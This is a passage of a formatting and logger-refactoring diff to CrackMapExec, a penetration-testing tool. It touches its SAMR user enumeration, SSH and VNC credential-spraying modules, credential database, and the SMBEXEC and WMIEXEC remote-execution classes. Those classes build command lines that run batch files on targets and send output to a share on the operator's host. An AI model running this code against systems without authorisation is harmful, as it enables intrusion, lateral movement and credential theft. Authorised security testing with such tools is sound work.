class SamrFunc: def __init__(self, connection): - self.logger = cme_logger - self.addr = ( - connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain - ) + self.logger = connection.logger + self.addr = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain self.protocol = connection.args.port self.username = connection.username self.password = connection.password @@ -54,6 +50,7 @@ class SamrFunc: remote_name=self.addr, remote_host=self.addr, kerberos=self.doKerberos, + logger=self.logger ) def get_builtin_groups(self): @@ -90,14 +87,10 @@ class SamrFunc: def get_local_administrators(self): self.get_builtin_groups() if "Administrators" in self.groups: - self.logger.success( - f"Found Local Administrators group: RID {self.groups['Administrators']}" - ) + self.logger.success(f"Found Local Administrators group: RID {self.groups['Administrators']}") domain_handle = self.samr_query.get_domain_handle("Builtin") self.logger.debug(f"Querying group members") - member_sids = self.samr_query.get_alias_members( - domain_handle, self.groups["Administrators"] - ) + member_sids = self.samr_query.get_alias_members(domain_handle, self.groups["Administrators"]) member_names = self.lsa_query.lookup_sids(member_sids) for sid, name in zip(member_sids, member_names): @@ -181,12 +174,8 @@ class SAMRQuery: return domain_names def get_domain_handle(self, domain_name): - resp = samr.hSamrLookupDomainInSamServer( - self.dce, self.server_handle, domain_name - ) - resp = samr.hSamrOpenDomain( - self.dce, serverHandle=self.server_handle, domainId=resp["DomainId"] - ) + resp = samr.hSamrLookupDomainInSamServer(self.dce, self.server_handle, domain_name) + resp = samr.hSamrOpenDomain(self.dce, serverHandle=self.server_handle, domainId=resp["DomainId"]) return resp["DomainHandle"] def get_domain_aliases(self, domain_handle): @@ -197,9 +186,7 @@ class SAMRQuery: return aliases def get_alias_handle(self, domain_handle, alias_id): - resp = samr.hSamrOpenAlias( - self.dce, domain_handle, desiredAccess=MAXIMUM_ALLOWED, aliasId=alias_id - ) + resp = samr.hSamrOpenAlias(self.dce, domain_handle, desiredAccess=MAXIMUM_ALLOWED, 
aliasId=alias_id) return resp["AliasHandle"] def get_alias_members(self, domain_handle, alias_id): @@ -221,6 +208,7 @@ class LSAQuery: remote_name="", remote_host="", kerberos=None, + logger=None ): self.__username = username self.__password = password @@ -234,7 +222,7 @@ class LSAQuery: self.__kerberos = kerberos self.dce = self.get_dce() self.policy_handle = self.get_policy_handle() - self.logger = cme_logger + self.logger = logger def get_transport(self): string_binding = f"ncacn_np:{self.__remote_name}[\\pipe\\lsarpc]" @@ -269,15 +257,11 @@ class LSAQuery: return dce def get_policy_handle(self): - resp = lsad.hLsarOpenPolicy2( - self.dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES - ) + resp = lsad.hLsarOpenPolicy2(self.dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES) return resp["PolicyHandle"] def lookup_sids(self, sids): - resp = lsat.hLsarLookupSids( - self.dce, self.policy_handle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta - ) + resp = lsat.hLsarLookupSids(self.dce, self.policy_handle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta) names = [] for translated_names in resp["TranslatedNames"]["Names"]: names.append(translated_names["Name"]) diff --git a/cme/protocols/smb/samruser.py b/cme/protocols/smb/samruser.py index 973ac6d9..8ac85835 100644 --- a/cme/protocols/smb/samruser.py +++ b/cme/protocols/smb/samruser.py @@ -7,8 +7,6 @@ from impacket.dcerpc.v5.rpcrt import DCERPCException from impacket.dcerpc.v5.rpcrt import DCERPC_v5 from impacket.nt_errors import STATUS_MORE_ENTRIES -from cme.logger import cme_logger - class UserSamrDump: KNOWN_PROTOCOLS = { @@ -17,12 +15,8 @@ class UserSamrDump: } def __init__(self, connection): - self.logger = cme_logger - self.addr = ( - connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain - ) + self.logger = connection.logger + self.addr = connection.host if not connection.kerberos else connection.hostname + "." 
+ connection.domain self.protocol = connection.args.port self.username = connection.username self.password = connection.password @@ -116,9 +110,7 @@ class UserSamrDump: enumerationContext = 0 while status == STATUS_MORE_ENTRIES: try: - resp = samr.hSamrEnumerateUsersInDomain( - dce, domainHandle, enumerationContext=enumerationContext - ) + resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext=enumerationContext) except DCERPCException as e: if str(e).find("STATUS_MORE_ENTRIES") < 0: self.logger.fail("Error enumerating domain user(s)") @@ -126,20 +118,14 @@ class UserSamrDump: resp = e.get_packet() self.logger.success("Enumerated domain user(s)") for user in resp["Buffer"]["Buffer"]: - r = samr.hSamrOpenUser( - dce, domainHandle, samr.MAXIMUM_ALLOWED, user["RelativeId"] - ) - info = samr.hSamrQueryInformationUser2( - dce, r["UserHandle"], samr.USER_INFORMATION_CLASS.UserAllInformation - ) + r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user["RelativeId"]) + info = samr.hSamrQueryInformationUser2(dce, r["UserHandle"], samr.USER_INFORMATION_CLASS.UserAllInformation) (username, uid, info_user) = ( user["Name"], user["RelativeId"], info["Buffer"]["All"], ) - self.logger.highlight( - f"{self.domain}\\{user['Name']:<30} {info_user['AdminComment']}" - ) + self.logger.highlight(f"{self.domain}\\{user['Name']:<30} {info_user['AdminComment']}") self.users.append(user["Name"]) samr.hSamrCloseHandle(dce, r["UserHandle"]) diff --git a/cme/protocols/smb/smbexec.py b/cme/protocols/smb/smbexec.py index bb94a064..cc0d7d9e 100755 --- a/cme/protocols/smb/smbexec.py +++ b/cme/protocols/smb/smbexec.py @@ -26,6 +26,7 @@ class SMBEXEC: hashes=None, share=None, port=445, + logger=cme_logger ): self.__host = host self.__share_name = "C$" @@ -50,7 +51,7 @@ class SMBEXEC: self.__aesKey = aesKey self.__doKerberos = doKerberos self.__kdcHost = kdcHost - self.logger = cme_logger + self.logger = logger if hashes is not None: # This checks to see if we didn't provide the LM Hash @@ -112,12 +113,7 @@ class SMBEXEC: self.__batchFile = gen_random_string(6) + ".bat" if self.__retOutput: - command = ( - self.__shell - + "echo " - + data - + f" ^> \\\\127.0.0.1\\{self.__share_name}\\{self.__output} 2^>^&1 > %TEMP%\{self.__batchFile} & %COMSPEC% /Q /c %TEMP%\{self.__batchFile} & %COMSPEC% /Q /c del %TEMP%\{self.__batchFile}" - ) + command = self.__shell + "echo " + data + f" ^> \\\\127.0.0.1\\{self.__share_name}\\{self.__output} 2^>^&1 > %TEMP%\{self.__batchFile} & %COMSPEC% /Q /c %TEMP%\{self.__batchFile} & %COMSPEC% /Q /c del %TEMP%\{self.__batchFile}" else: command = self.__shell + data @@ -156,9 +152,7 @@ class SMBEXEC: return while True: try: - self.__smbconnection.getFile( - self.__share, self.__output, self.output_callback - ) + self.__smbconnection.getFile(self.__share, self.__output, self.output_callback) break except Exception as e: print(e) @@ -178,11 +172,7 @@ class SMBEXEC: local_ip = self.__rpctransport.get_socket().getsockname()[0] if self.__retOutput: - command = ( - self.__shell - + data - + f" ^> \\\\{local_ip}\\{self.__share_name}\\{self.__output}" - ) + command = self.__shell + data + f" ^> \\\\{local_ip}\\{self.__share_name}\\{self.__output}" else: command = self.__shell + data @@ -191,9 +181,7 @@ class SMBEXEC: self.logger.debug("Hosting batch file with command: " + command) - command = ( - self.__shell + f"\\\\{local_ip}\\{self.__share_name}\\{self.__batchFile}" - ) + command = self.__shell + f"\\\\{local_ip}\\{self.__share_name}\\{self.__batchFile}" 
self.logger.debug("Command to execute: " + command) self.logger.debug(f"Remote service {self.__serviceName} created.") @@ -223,9 +211,7 @@ class SMBEXEC: while True: try: - with open( - path_join("/tmp", "cme_hosted", self.__output), "rb" - ) as output: + with open(path_join("/tmp", "cme_hosted", self.__output), "rb") as output: self.output_callback(output.read()) break except IOError: diff --git a/cme/protocols/smb/smbspider.py b/cme/protocols/smb/smbspider.py index 0329abec..a0aad13a 100755 --- a/cme/protocols/smb/smbspider.py +++ b/cme/protocols/smb/smbspider.py @@ -96,9 +96,7 @@ class SMBSpider: except SessionError as e: if not filelist: if "STATUS_ACCESS_DENIED" not in str(e): - self.logger.debug( - f"Failed listing files on share {self.share} in directory {subfolder}: {e}" - ) + self.logger.debug(f"Failed listing files on share {self.share} in directory {subfolder}: {e}") return for result in filelist: @@ -108,9 +106,7 @@ class SMBSpider: subfolder.replace("*", "") + result.get_longname(), depth - 1 if depth else None, ) - elif subfolder != "*" and ( - subfolder[:-2].split("/")[-1] not in self.exclude_dirs - ): + elif subfolder != "*" and (subfolder[:-2].split("/")[-1] not in self.exclude_dirs): self._spider( subfolder.replace("*", "") + result.get_longname(), depth - 1 if depth else None, @@ -122,16 +118,9 @@ class SMBSpider: for result in files: if self.pattern: for pattern in self.pattern: - if ( - bytes(result.get_longname().lower(), "utf8").find( - bytes(pattern.lower(), "utf8") - ) - != -1 - ): + if bytes(result.get_longname().lower(), "utf8").find(bytes(pattern.lower(), "utf8")) != -1: if not self.onlyfiles and result.is_directory(): - self.logger.highlight( - f"//{self.smbconnection.getRemoteHost()}/{self.share}/{path}{result.get_longname()} [dir]" - ) + self.logger.highlight(f"//{self.smbconnection.getRemoteHost()}/{self.share}/{path}{result.get_longname()} [dir]") else: self.logger.highlight( "//{}/{}/{}{} [lastm:'{}' size:{}]".format( @@ -139,9 +128,7 @@ class SMBSpider: self.share, path, result.get_longname(), - "n\\a" - if not self.get_lastm_time(result) - else self.get_lastm_time(result), + "n\\a" if not self.get_lastm_time(result) else self.get_lastm_time(result), result.get_filesize(), ) ) @@ -150,9 +137,7 @@ class SMBSpider: for regex in self.regex: if regex.findall(bytes(result.get_longname(), "utf8")): if not self.onlyfiles and result.is_directory(): - self.logger.highlight( - f"//{self.smbconnection.getRemoteHost()}/{self.share}/{path}{result.get_longname()} [dir]" - ) + self.logger.highlight(f"//{self.smbconnection.getRemoteHost()}/{self.share}/{path}{result.get_longname()} [dir]") else: self.logger.highlight( "//{}/{}/{}{} [lastm:'{}' size:{}]".format( @@ -160,9 +145,7 @@ class SMBSpider: self.share, path, result.get_longname(), - "n\\a" - if not self.get_lastm_time(result) - else self.get_lastm_time(result), + "n\\a" if not self.get_lastm_time(result) else self.get_lastm_time(result), result.get_filesize(), ) ) @@ -206,9 +189,7 @@ class SMBSpider: self.share, path, result.get_longname(), - "n\\a" - if not self.get_lastm_time(result) - else self.get_lastm_time(result), + "n\\a" if not self.get_lastm_time(result) else self.get_lastm_time(result), result.get_filesize(), rfile.tell(), pattern, @@ -224,9 +205,7 @@ class SMBSpider: self.share, path, result.get_longname(), - "n\\a" - if not self.get_lastm_time(result) - else self.get_lastm_time(result), + "n\\a" if not self.get_lastm_time(result) else self.get_lastm_time(result), result.get_filesize(), rfile.tell(), 
regex.pattern, @@ -247,9 +226,7 @@ class SMBSpider: def get_lastm_time(self, result_obj): lastm_time = None try: - lastm_time = strftime( - "%Y-%m-%d %H:%M", localtime(result_obj.get_mtime_epoch()) - ) + lastm_time = strftime("%Y-%m-%d %H:%M", localtime(result_obj.get_mtime_epoch())) except Exception: pass diff --git a/cme/protocols/smb/wmiexec.py b/cme/protocols/smb/wmiexec.py index b6d7046a..57c8e2e2 100755 --- a/cme/protocols/smb/wmiexec.py +++ b/cme/protocols/smb/wmiexec.py @@ -25,6 +25,7 @@ class WMIEXEC: kdcHost=None, hashes=None, share=None, + logger=cme_logger ): self.__target = target self.__username = username @@ -43,7 +44,7 @@ class WMIEXEC: self.__kdcHost = kdcHost self.__doKerberos = doKerberos self.__retOutput = True - self.logger = cme_logger + self.logger = logger if hashes is not None: # This checks to see if we didn't provide the LM Hash @@ -66,9 +67,7 @@ class WMIEXEC: doKerberos=self.__doKerberos, kdcHost=self.__kdcHost, ) - iInterface = self.__dcom.CoCreateInstanceEx( - wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login - ) + iInterface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login) iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL) iWbemLevel1Login.RemRelease() @@ -127,11 +126,7 @@ class WMIEXEC: self.__output = gen_random_string(6) local_ip = self.__smbconnection.getSMBServer().get_socket().getsockname()[0] - command = ( - self.__shell - + data - + f" 1> \\\\{local_ip}\\{self.__share_name}\\{self.__output} 2>&1" - ) + command = self.__shell + data + f" 1> \\\\{local_ip}\\{self.__share_name}\\{self.__output} 2>&1" self.logger.debug("Executing command: " + command) self.__win32Process.Create(command, self.__pwd, None) @@ -140,9 +135,7 @@ class WMIEXEC: def get_output_fileless(self): while True: try: - with open( - os.path.join("/tmp", "cme_hosted", self.__output), "r" - ) as output: + with open(os.path.join("/tmp", "cme_hosted", self.__output), "r") as output: self.output_callback(output.read()) break except IOError: @@ -155,9 +148,7 @@ class WMIEXEC: while True: try: - self.__smbconnection.getFile( - self.__share, self.__output, self.output_callback - ) + self.__smbconnection.getFile(self.__share, self.__output, self.output_callback) break except Exception as e: if str(e).find("STATUS_SHARING_VIOLATION") >= 0: diff --git a/cme/protocols/ssh.py b/cme/protocols/ssh.py index 7c75380c..15eafa73 100644 --- a/cme/protocols/ssh.py +++ b/cme/protocols/ssh.py @@ -25,40 +25,26 @@ class ssh(connection): @staticmethod def proto_args(parser, std_parser, module_parser): - ssh_parser = parser.add_parser( - "ssh", help="own stuff using SSH", parents=[std_parser, module_parser] - ) + ssh_parser = parser.add_parser("ssh", help="own stuff using SSH", parents=[std_parser, module_parser]) ssh_parser.add_argument( "--no-bruteforce", action="store_true", - help=( - "No spray when using file for username and password (user1 =>" - " password1, user2 => password2" - ), + help=("No spray when using file for username and password (user1 =>" " password1, user2 => password2"), ) ssh_parser.add_argument( "--key-file", type=str, - help=( - "Authenticate using the specified private key. Treats the password" - " parameter as the key's passphrase." - ), - ) - ssh_parser.add_argument( - "--port", type=int, default=22, help="SSH port (default: 22)" + help=("Authenticate using the specified private key. 
Treats the password" " parameter as the key's passphrase."), ) + ssh_parser.add_argument("--port", type=int, default=22, help="SSH port (default: 22)") ssh_parser.add_argument( "--continue-on-success", action="store_true", help="continues authentication attempts even after successes", ) - cgroup = ssh_parser.add_argument_group( - "Command Execution", "Options for executing commands" - ) - cgroup.add_argument( - "--no-output", action="store_true", help="do not retrieve command output" - ) + cgroup = ssh_parser.add_argument_group("Command Execution", "Options for executing commands") + cgroup.add_argument("--no-output", action="store_true", help="do not retrieve command output") cgroup.add_argument( "-x", metavar="COMMAND", @@ -96,9 +82,7 @@ class ssh(connection): stdin, stdout, stderr = self.conn.exec_command("uname -r") self.server_os = stdout.read().decode("utf-8") self.logger.debug(f"OS retrieved: {self.server_os}") - self.db.add_host( - self.host, self.args.port, self.remote_version, os=self.server_os - ) + self.db.add_host(self.host, self.args.port, self.remote_version, os=self.server_os) def create_conn_obj(self): self.conn = paramiko.SSHClient() @@ -126,9 +110,7 @@ class ssh(connection): self.logger.info(f"Determined user is root via `id` command") self.admin_privs = True return True - stdin, stdout, stderr = self.conn.exec_command( - "sudo -ln | grep 'NOPASSWD: ALL'" - ) + stdin, stdout, stderr = self.conn.exec_command("sudo -ln | grep 'NOPASSWD: ALL'") if stdout.read().decode("utf-8").find("NOPASSWD: ALL") != -1: self.logger.info(f"Determined user is root via `sudo -ln` command") self.admin_privs = True @@ -185,13 +167,9 @@ class ssh(connection): if self.check_if_admin(): shell_access = True - self.logger.debug( - f"User {username} logged in successfully and is root!" - ) + self.logger.debug(f"User {username} logged in successfully and is root!") if self.args.key_file: - self.db.add_admin_user( - "key", username, password, host_id=host_id, cred_id=cred_id - ) + self.db.add_admin_user("key", username, password, host_id=host_id, cred_id=cred_id) else: self.db.add_admin_user( "plaintext", @@ -216,9 +194,7 @@ class ssh(connection): display_shell_access = f" - shell access!" 
if shell_access else "" - self.logger.success( - f"{username}:{process_secret(password)} {self.mark_pwned()}{highlight(display_shell_access)}" - ) + self.logger.success(f"{username}:{process_secret(password)} {self.mark_pwned()}{highlight(display_shell_access)}") if not self.args.continue_on_success: return True diff --git a/cme/protocols/ssh/database.py b/cme/protocols/ssh/database.py index 07500023..c1d7650a 100644 --- a/cme/protocols/ssh/database.py +++ b/cme/protocols/ssh/database.py @@ -88,29 +88,14 @@ class database: def reflect_tables(self): with self.db_engine.connect(): try: - self.CredentialsTable = Table( - "credentials", self.metadata, autoload_with=self.db_engine - ) - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) - self.LoggedinRelationsTable = Table( - "loggedin_relations", self.metadata, autoload_with=self.db_engine - ) - self.AdminRelationsTable = Table( - "admin_relations", self.metadata, autoload_with=self.db_engine - ) - self.KeysTable = Table( - "keys", self.metadata, autoload_with=self.db_engine - ) + self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) + self.LoggedinRelationsTable = Table("loggedin_relations", self.metadata, autoload_with=self.db_engine) + self.AdminRelationsTable = Table("admin_relations", self.metadata, autoload_with=self.db_engine) + self.KeysTable = Table("keys", self.metadata, autoload_with=self.db_engine) except (NoInspectionAvailable, NoSuchTableError): ssh_workspace = f"~/.cme/workspaces/{cme_workspace}/ssh.db" - print( - "[-] Error reflecting tables for SSH protocol - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - f"[-] Optionally save the old DB data (`cp {ssh_workspace} ~/cme_ssh.bak`)\n" - f"[-] Then remove the CME SSH DB (`rm -rf {ssh_workspace}`) and run CME to initialize the new DB" - ) + print("[-] Error reflecting tables for SSH protocol - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" f"[-] Optionally save the old DB data (`cp {ssh_workspace} ~/cme_ssh.bak`)\n" f"[-] Then remove the CME SSH DB (`rm -rf {ssh_workspace}`) and run CME to initialize the new DB") exit() def shutdown_db(self): @@ -170,9 +155,7 @@ class database: # TODO: find a way to abstract this away to a single Upsert call q = Insert(self.HostsTable) # .returning(self.HostsTable.c.id) update_columns = {col.name: col for col in q.excluded if col.name not in "id"} - q = q.on_conflict_do_update( - index_elements=self.HostsTable.primary_key, set_=update_columns - ) + q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns) self.sess.execute(q, hosts) # .scalar() # we only return updated IDs for now - when RETURNING clause is allowed we can return inserted @@ -192,10 +175,8 @@ class database: select(self.CredentialsTable) .join(self.KeysTable) .filter( - func.lower(self.CredentialsTable.c.username) - == func.lower(username), - func.lower(self.CredentialsTable.c.credtype) - == func.lower(credtype), + func.lower(self.CredentialsTable.c.username) == func.lower(username), + func.lower(self.CredentialsTable.c.credtype) == func.lower(credtype), self.KeysTable.c.data == key, ) ) @@ -232,15 +213,9 @@ class database: credentials.append(cred_data) # TODO: find a way to abstract this away to a single Upsert call - q_users 
= Insert( - self.CredentialsTable - ) # .returning(self.CredentialsTable.c.id) - update_columns_users = { - col.name: col for col in q_users.excluded if col.name not in "id" - } - q_users = q_users.on_conflict_do_update( - index_elements=self.CredentialsTable.primary_key, set_=update_columns_users - ) + q_users = Insert(self.CredentialsTable) # .returning(self.CredentialsTable.c.id) + update_columns_users = {col.name: col for col in q_users.excluded if col.name not in "id"} + q_users = q_users.on_conflict_do_update(index_elements=self.CredentialsTable.primary_key, set_=update_columns_users) cme_logger.debug(f"Adding credentials: {credentials}") self.sess.execute(q_users, credentials) # .scalar() @@ -261,17 +236,13 @@ class database: """ del_hosts = [] for cred_id in creds_id: - q = delete(self.CredentialsTable).filter( - self.CredentialsTable.c.id == cred_id - ) + q = delete(self.CredentialsTable).filter(self.CredentialsTable.c.id == cred_id) del_hosts.append(q) self.sess.execute(q) def add_key(self, cred_id, key): # check if key relation already exists - check_q = self.sess.execute( - select(self.KeysTable).filter(self.KeysTable.c.credid == cred_id) - ).all() + check_q = self.sess.execute(select(self.KeysTable).filter(self.KeysTable.c.credid == cred_id)).all() cme_logger.debug(f"check_q: {check_q}") if check_q: cme_logger.debug(f"Key already exists for cred_id {cred_id}") @@ -279,13 +250,7 @@ class database: key_data = {"credid": cred_id, "data": key} self.sess.execute(Insert(self.KeysTable), key_data) - key_id = ( - self.sess.execute( - select(self.KeysTable).filter(self.KeysTable.c.credid == cred_id) - ) - .all()[0] - .id - ) + key_id = self.sess.execute(select(self.KeysTable).filter(self.KeysTable.c.credid == cred_id)).all()[0].id cme_logger.debug(f"Key added: {key_id}") return key_id @@ -334,13 +299,9 @@ class database: def get_admin_relations(self, cred_id=None, host_id=None): if cred_id: - q = select(self.AdminRelationsTable).filter( - self.AdminRelationsTable.c.credid == cred_id - ) + q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.credid == cred_id) elif host_id: - q = select(self.AdminRelationsTable).filter( - self.AdminRelationsTable.c.hostid == host_id - ) + q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id) else: q = select(self.AdminRelationsTable) @@ -374,19 +335,13 @@ class database: """ # if we're returning a single credential by ID if self.is_credential_valid(filter_term): - q = select(self.CredentialsTable).filter( - self.CredentialsTable.c.id == filter_term - ) + q = select(self.CredentialsTable).filter(self.CredentialsTable.c.id == filter_term) elif cred_type: - q = select(self.CredentialsTable).filter( - self.CredentialsTable.c.credtype == cred_type - ) + q = select(self.CredentialsTable).filter(self.CredentialsTable.c.credtype == cred_type) # if we're filtering by username elif filter_term and filter_term != "": like_term = func.lower(f"%{filter_term}%") - q = select(self.CredentialsTable).filter( - func.lower(self.CredentialsTable.c.username).like(like_term) - ) + q = select(self.CredentialsTable).filter(func.lower(self.CredentialsTable.c.username).like(like_term)) # otherwise return all credentials else: q = select(self.CredentialsTable) @@ -455,9 +410,7 @@ class database: return results def get_user(self, domain, username): - q = select(self.CredentialsTable).filter( - func.lower(self.CredentialsTable.c.username) == func.lower(username) - ) + q = 
select(self.CredentialsTable).filter(func.lower(self.CredentialsTable.c.username) == func.lower(username)) results = self.sess.execute(q).all() return results @@ -474,23 +427,17 @@ class database: try: cme_logger.debug(f"Inserting loggedin_relations: {relation}") # TODO: find a way to abstract this away to a single Upsert call - q = Insert( - self.LoggedinRelationsTable - ) # .returning(self.LoggedinRelationsTable.c.id) + q = Insert(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id) self.sess.execute(q, [relation]) # .scalar() inserted_id_results = self.get_loggedin_relations(cred_id, host_id) - cme_logger.debug( - f"Checking if relation was added: {inserted_id_results}" - ) + cme_logger.debug(f"Checking if relation was added: {inserted_id_results}") return inserted_id_results[0].id except Exception as e: cme_logger.debug(f"Error inserting LoggedinRelation: {e}") def get_loggedin_relations(self, cred_id=None, host_id=None, shell=None): - q = select( - self.LoggedinRelationsTable - ) # .returning(self.LoggedinRelationsTable.c.id) + q = select(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id) if cred_id: q = q.filter(self.LoggedinRelationsTable.c.credid == cred_id) if host_id: diff --git a/cme/protocols/ssh/db_navigator.py b/cme/protocols/ssh/db_navigator.py index 1bcfd765..c213ac3a 100644 --- a/cme/protocols/ssh/db_navigator.py +++ b/cme/protocols/ssh/db_navigator.py @@ -26,9 +26,7 @@ class navigator(DatabaseNavigator): admin_links = self.db.get_admin_relations(cred_id=cred_id) total_users = self.db.get_loggedin_relations(cred_id=cred_id) - total_shell = total_users = self.db.get_loggedin_relations( - cred_id=cred_id, shell=True - ) + total_shell = total_users = self.db.get_loggedin_relations(cred_id=cred_id, shell=True) data.append( [ @@ -95,12 +93,8 @@ class navigator(DatabaseNavigator): data.append([host_id, host, port, banner, os]) print_table(data, title="Host") - admin_access_data = [ - ["CredID", "CredType", "UserName", "Password", "Shell"] - ] - nonadmin_access_data = [ - ["CredID", "CredType", "UserName", "Password", "Shell"] - ] + admin_access_data = [["CredID", "CredType", "UserName", "Password", "Shell"]] + nonadmin_access_data = [["CredID", "CredType", "UserName", "Password", "Shell"]] for host_id in host_id_list: admin_links = self.db.get_admin_relations(host_id=host_id) nonadmin_links = self.db.get_loggedin_relations(host_id=host_id) @@ -116,9 +110,7 @@ class navigator(DatabaseNavigator): credtype = cred[3] shell = True - admin_access_data.append( - [cred_id, credtype, username, password, shell] - ) + admin_access_data.append([cred_id, credtype, username, password, shell]) # probably a better way to do this without looping through and requesting them all again, # but I just want to get this working for now @@ -143,9 +135,7 @@ class navigator(DatabaseNavigator): title="Credential(s) with Non Admin Access", ) if len(admin_access_data) > 1: - print_table( - admin_access_data, title="Credential(s) with Admin Access" - ) + print_table(admin_access_data, title="Credential(s) with Admin Access") def help_hosts(self): help_string = """ @@ -208,12 +198,8 @@ class navigator(DatabaseNavigator): cred_data.append([cred_id, username, password, credtype]) print_table(cred_data, title="Credential(s)") - admin_access_data = [ - ["HostID", "Host", "Port", "Banner", "OS", "Shell"] - ] - nonadmin_access_data = [ - ["HostID", "Host", "Port", "Banner", "OS", "Shell"] - ] + admin_access_data = [["HostID", "Host", "Port", "Banner", "OS", "Shell"]] + 
nonadmin_access_data = [["HostID", "Host", "Port", "Banner", "OS", "Shell"]] for cred_id in cred_id_list: admin_links = self.db.get_admin_relations(cred_id=cred_id) @@ -228,13 +214,9 @@ class navigator(DatabaseNavigator): port = h[2] banner = h[3] os = h[4] - shell = ( - True # if we have root via SSH, we know it's a shell - ) + shell = True # if we have root via SSH, we know it's a shell - admin_access_data.append( - [host_id, host, port, banner, os, shell] - ) + admin_access_data.append([host_id, host, port, banner, os, shell]) # probably a better way to do this without looping through and requesting them all again, # but I just want to get this working for now @@ -253,9 +235,7 @@ class navigator(DatabaseNavigator): # we look if it's greater than one because the header row always exists if len(nonadmin_access_data) > 1: - print_table( - nonadmin_access_data, title="Non-Admin Access to Host(s)" - ) + print_table(nonadmin_access_data, title="Non-Admin Access to Host(s)") if len(admin_access_data) > 1: print_table(admin_access_data, title="Admin Access to Host(s)") @@ -307,13 +287,7 @@ class navigator(DatabaseNavigator): print_help(help_string) def do_clear_database(self, line): - if ( - input( - "This will destroy all data in the current database, are you SURE you" - " want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you" " want to run this? (y/n): ") == "y": self.db.clear_database() def help_clear_database(self): diff --git a/cme/protocols/vnc.py b/cme/protocols/vnc.py index cc33af9d..6359e0c6 100644 --- a/cme/protocols/vnc.py +++ b/cme/protocols/vnc.py @@ -30,9 +30,7 @@ class vnc(connection): @staticmethod def proto_args(parser, std_parser, module_parser): - vnc_parser = parser.add_parser( - "vnc", help="own stuff using VNC", parents=[std_parser, module_parser] - ) + vnc_parser = parser.add_parser("vnc", help="own stuff using VNC", parents=[std_parser, module_parser]) vnc_parser.add_argument( "--no-bruteforce", action="store_true", @@ -43,9 +41,7 @@ class vnc(connection): action="store_true", help="continues authentication attempts even after successes", ) - vnc_parser.add_argument( - "--port", type=int, default=5900, help="Custom VNC port" - ) + vnc_parser.add_argument("--port", type=int, default=5900, help="Custom VNC port") vnc_parser.add_argument( "--vnc-sleep", type=int, @@ -59,9 +55,7 @@ class vnc(connection): action="store_true", help="Screenshot VNC if connection success", ) - egroup.add_argument( - "--screentime", type=int, default=5, help="Time to wait for desktop image" - ) + egroup.add_argument("--screentime", type=int, default=5, help="Time to wait for desktop image") return parser @@ -91,12 +85,8 @@ class vnc(connection): def create_conn_obj(self): try: self.target = RDPTarget(ip=self.host, port=self.args.port) - credential = UniCredential( - protocol=asyauthProtocol.PLAIN, stype=asyauthSecret.NONE - ) - self.conn = VNCConnection( - target=self.target, credentials=credential, iosettings=self.iosettings - ) + credential = UniCredential(protocol=asyauthProtocol.PLAIN, stype=asyauthSecret.NONE) + self.conn = VNCConnection(target=self.target, credentials=credential, iosettings=self.iosettings) asyncio.run(self.connect_vnc(True)) except Exception as e: self.logger.debug(str(e)) @@ -117,9 +107,7 @@ class vnc(connection): stype = asyauthSecret.PASS if password == "": stype = asyauthSecret.NONE - self.credential = UniCredential( - secret=password, protocol=asyauthProtocol.PLAIN, stype=stype - ) + 
self.credential = UniCredential(secret=password, protocol=asyauthProtocol.PLAIN, stype=stype) self.conn = VNCConnection( target=self.target, credentials=self.credential, @@ -131,11 +119,7 @@ class vnc(connection): self.logger.success( "{} {}".format( password, - highlight( - f"({self.config.get('CME', 'pwn3d_label')})" - if self.admin_privs - else "" - ), + highlight(f"({self.config.get('CME', 'pwn3d_label')})" if self.admin_privs else ""), ) ) if not self.args.continue_on_success: @@ -147,11 +131,7 @@ class vnc(connection): self.logger.success( "{} {}".format( "No password seems to be accepted by the server", - highlight( - f"({self.config.get('CME', 'pwn3d_label')})" - if self.admin_privs - else "" - ), + highlight(f"({self.config.get('CME', 'pwn3d_label')})" if self.admin_privs else ""), ) ) else: @@ -159,16 +139,12 @@ class vnc(connection): return False async def screen(self): - self.conn = VNCConnection( - target=self.target, credentials=self.credential, iosettings=self.iosettings - ) + self.conn = VNCConnection(target=self.target, credentials=self.credential, iosettings=self.iosettings) await self.connect_vnc() await asyncio.sleep(int(self.args.screentime)) if self.conn is not None and self.conn.desktop_buffer_has_data is True: buffer = self.conn.get_desktop_buffer(VIDEO_FORMAT.PIL) - filename = os.path.expanduser( - f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png" - ) + filename = os.path.expanduser(f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png") buffer.save(filename, "png") self.logger.highlight(f"Screenshot saved {filename}") diff --git a/cme/protocols/vnc/database.py b/cme/protocols/vnc/database.py index 1c5003f2..1f910278 100644 --- a/cme/protocols/vnc/database.py +++ b/cme/protocols/vnc/database.py @@ -55,19 +55,10 @@ class database: def reflect_tables(self): with self.db_engine.connect() as conn: try: - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) - self.CredentialsTable = Table( 